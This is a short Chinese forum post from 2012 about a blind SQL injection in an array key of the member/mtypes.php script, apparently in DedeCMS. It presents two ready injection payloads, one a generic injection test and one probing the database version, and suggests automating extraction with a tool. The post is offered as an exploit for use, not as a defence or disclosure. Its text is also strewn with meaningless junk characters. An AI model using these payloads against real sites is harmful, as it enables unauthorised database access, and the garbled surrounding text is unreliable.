需要magic_quotes_gpc = Off,所以说是鸡肋啊.& I/ M/ d9 |; ]8 }4 H6 p. t" W
0 N' ]6 n! H/ Y0 ?$ y
9 N/ @/ A% L% e: b) N2 A发生在数组key里的注射漏洞,有点意思.8 N; m/ \0 h4 \
4 @( t1 n! k8 O6 n" M* v这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下% f( m/ v# ~3 V: I7 g8 v
5 u9 ~( j8 N9 U! s$ ^
http://www.xxx.com /dede/member/mtypes.php?dopost=save5 Z4 E% b3 N$ O; Y- D+ T+ X
' ^: p8 J2 F% M y/ J
exploit:. c, ?6 a3 x6 W0 ~& S
mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r" Q, |7 }/ s- k5 q+ S$ L& x' B9 }
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r; C8 V$ b: R+ u |+ d
|
发表于 2012-12-20 08:08:09
收藏
支持
反对